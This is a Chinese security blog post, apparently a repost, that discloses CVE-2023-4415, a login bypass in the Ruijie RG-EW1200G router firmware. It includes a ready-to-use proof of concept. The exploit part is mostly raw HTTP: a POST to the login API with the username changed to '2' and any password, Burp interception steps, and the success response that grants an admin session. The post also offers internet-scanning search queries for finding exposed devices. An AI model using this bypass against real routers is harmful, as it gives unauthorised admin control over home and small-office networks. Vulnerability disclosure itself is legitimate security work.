CVE-2023-4415:锐捷RG-EW1200G 登录绕过 附POC

admin
admin
admin
102932
文章
87
评论
2023年8月20日14:33:22CVE-2023-4415:锐捷RG-EW1200G 登录绕过 附POC已关闭评论392 views字数 2006阅读6分41秒阅读模式

简介

锐捷网络RG-EW1200G是一款有线无线全千兆双频无线路由器,适合平层家居、别墅、小型店铺、SOHO办公等场景使用。设备性能卓越,足以满足千兆上网需求;信号强劲,信号功率功率提升3倍,覆盖距离提升近1倍覆盖能力强 。

漏洞描述

锐捷网络RG-EW1200G HWR_1.0(1)B1P5,Release(07161417) r483存在登录绕过逻辑漏洞,允许任何用户无需密码即可获得设备管理员权限。登录路由器,获取敏感信息,控制内部网络。

影响版本

受影响产品:RG-EW1200G无线路由器

受影响固件:HWR_1.0(1)B1P5,Release(07161417) r483

漏洞利用

POC

POST /api/sys/login HTTP/1.1Host: xxx.xxx.xxx:6060Content-Length: 59Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26Content-Type: application/x-www-form-urlencodedOrigin: http://xxx.xxx.xxx:6060Referer: http://xxx.xxx.xxx:6060/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9sec-ch-ua-platform: "Windows"sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Connection: close
{"username":"2","password":"123","timestamp":1692412880000}

1.进入RG-EW1200G登录页面,密码随便输

图片

2.Burp抓取登录数据包,将“username”改为“2”

POST /api/sys/login HTTP/1.1Host: xxx.xxx.xxx:6060Content-Length: 59Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26Content-Type: application/x-www-form-urlencodedOrigin: http://xxx.xxx.xxx:6060Referer: http://xxx.xxx.xxx:6060/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9sec-ch-ua-platform: "Windows"sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Connection: close
{"username":"2","password":"123","timestamp":1692412880000}

图片

3.发包即可登录成功

HTTP/1.1 200 OKServer: nginxDate: Sat, 19 Aug 2023 02:41:32 GMTContent-Type: application/json; charset=utf-8Connection: closeSet-Cookie: bcrsession=f1d7956e195d123d8f0b4a6670553a7cdf9eb8807947d737eea204b1ae88d5460358d3112d7f66df; Path=/; Max-Age=21600Content-Length: 83
{"msg":"登入成功","result":"ok","data":{"is_init":false,"dev_mode":"gateway"}}

图片

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-4415https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic

回复“CVE-2023-4415” 获取空间测绘空间搜索语句

仅供学习交流,勿用作违法犯罪


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月20日14:33:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-4415:锐捷RG-EW1200G 登录绕过 附POChttps://cn-sec.com/archives/1965226.html